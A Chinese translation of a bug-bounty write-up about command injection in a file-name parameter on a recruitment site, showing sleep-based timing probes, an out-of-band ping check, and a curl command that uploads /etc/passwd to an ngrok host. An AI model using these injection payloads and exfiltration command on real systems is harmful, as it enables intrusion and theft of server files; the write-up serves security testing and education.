Command Injection Poc(命令注入)

原文:https://medium.com/bugbountywriteup/command-injection-poc-72cc3743f10d

作者: NoGe

漏洞類型:命令注入

.......

 

在我測試一個招聘網站的時候,非常有趣的事情是,我發現一個文件名參數可以進行注入

下面是整個漏洞複測流程:

1、首先在這個name參數處輸入''sleep 5' ,發現這個響應包延遲了5-6秒,以下是具體測試圖片

2、我再次輸入命令‘sleep 10’去驗證,發現這個響應包延遲了10-11秒,這裏我確定是存在漏洞了,以下是具體測試圖片

3、我在name參數再次注入‘ping -c 5 <我的服務器ip>’這條命令(這個命令執行成功意味着發送一個5秒的icmp包文到我的服務器上),並且在我的服務器上執行tcpdump -i <interface> -n icmp抓包

4、上述操作執行完成之後,看我的服務器上成功接收到了icmp響應,已經能夠成功的判斷name參數存在命令注入漏洞

 

5、接下來我繼續做另外一個測試,我在我的vps上面使用ngrok搭建web服務(./ngrok http 80),並且我在這個name參數處執行‘curl bd1b378d.ngrok.io’命令

6、現在我們我的ngrok的web頁面上看到了來自000.000.39.169這個ip地址的響應包

7、接下來我們可以使用命令‘curl -F shl=@/etc/passwd blablabla.ngrok.io’ 來讀取服務器的/etc/passwd文件併發送到我的ngrok上面

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章